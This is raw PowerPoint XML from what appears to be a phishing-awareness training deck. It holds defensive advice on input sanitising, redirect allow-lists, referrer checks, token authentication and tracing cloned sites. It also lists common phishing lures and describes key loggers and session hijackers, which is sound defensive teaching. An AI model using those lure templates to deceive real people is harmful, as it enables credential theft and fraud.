          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Never inherent trust the submitted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Always sanitize date before processing or storing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Check the HTTP referrer header – when tricked customers are directed from the phishing site to the targeted website, there is the option to check the referrer hearder in the requests to the targeted website and act on it by for example redirecting the tricked customer to the warning page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3982365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90A0662-C7EE-4DF5-8947-005C24146730}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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4010887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A6B95B8-9B67-4202-A295-608ABE1CCA92}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.Do not reference redirection URL in the browser’s URL – For example http://www.cognizant.com/redirect.aspx?URL=mypay.cognizant.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. Always maintain a valid approved list of redirection url’s. For example, manage a server-side list of url’s associated with an index parameter. When a client follows a link, their submission will reference this index, and the returned redirection page will contain the full managed URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. Never allow IP addresses to be user in URL information. Always user the fully qualified domain name or atleast conduct a reverse name lookup on the ip address and verify that it lies with a domain the application should be trusted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="900" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5902101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721224C-E57A-4C56-81CF-8D22D76A85E6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Design a strong token-based authentication – Hardware tokens &amp; Smart cards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>	Things to have in mind – randomness of the one-time password,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>					Expiry time of the one-time password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>					Length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>					Quality of challenge in a challenge and response based authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1533940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AF7A72D-FBCA-4AAF-BB15-9D0C5F52AED0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Transaction non-repudiation can be implemented through electronic signatures, either digital signatures or MAC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>To ensure authenticity and integrity of the transaction so as to ensure the origin of the transaction and identifying whether the message content has been altered during transit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>A transaction signature is a one-way value that uses aspects of the customer’s key, transaction content date and time. This signature is then validated using the appropriate scheme.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>MACS are supported by the challenge and response functionality of the hardware tokens.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5321268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E0660211-E45B-48FD-B5F0-1A15309A93C9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Depending on whether a phisher has mirrored the entire website or is just hosting a modified HTML page, it may be possible to identify the source of the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Image Cycling – Each legitimate application page references its constituent graphical images by a unique name.  Periodically, the names of the images are changed and the requesting page must reference these new image names. Therefore, any out-of-date static copies of the page will become dated quickly.  If an out-of-date image is requested, a different image is supplied – perhaps recommending that the customer login again to the real site – (e.g. “Warning Image Expired”).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Session-bound images – it is possible to reference all images with a name that includes the user’s current sessionID.  Therefore, once a fake website has been discovered, the logs can be reviewed and analyzed in order to discover the originating source of the copied website. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30338955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93BA0D0-DE53-44E3-AEAD-DC8968942D92}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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17095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8A40287-CFD5-43E1-A135-660208B40141}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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7004947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A277E9AE-80C1-410B-A2E7-364365E6DB6E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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802213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240643" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240644" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3884414" y="8684381"/>
            <a:ext cx="2972098" cy="458108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90567" tIns="45283" rIns="90567" bIns="45283" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{CCB03836-2063-47DE-9FAD-1ED709D33C06}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr 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a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Change the diagram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a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Change the diagram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a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Change the diagram</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449064C-344F-46E4-883D-F79C75282229}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Examples of a “call to action” include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>! A statement that there is a problem with the recipient’s account at a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>financial institution or other business. The email asks the recipient to visit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>a web site to correct the problem, using a deceptive link in the email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>! A statement that the recipient’s account is at risk, and offering to enroll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>the recipient in an anti-fraud program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>! A fictitious invoice for merchandise, often offensive merchandise, that the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>recipient did not order, with a link to “cancel” the fake order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>! A fraudulent notice of an undesirable change made to the user’s account,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>with a link to “dispute” the unauthorized change.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>! A claim that a new service is being rolled out at a financial institution, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>offering the recipient, as a current member, a limited-time opportunity to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>get the service for free.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1652830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2378F88-6676-4463-ABC3-A33F36F000AB}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Key Loggers &amp; Screen Loggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> - Monitors data being input and sends relevant data to a phishing server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Session Hijackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> - Malicious software “hijacks” the session once the user has legitimately established his or her credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
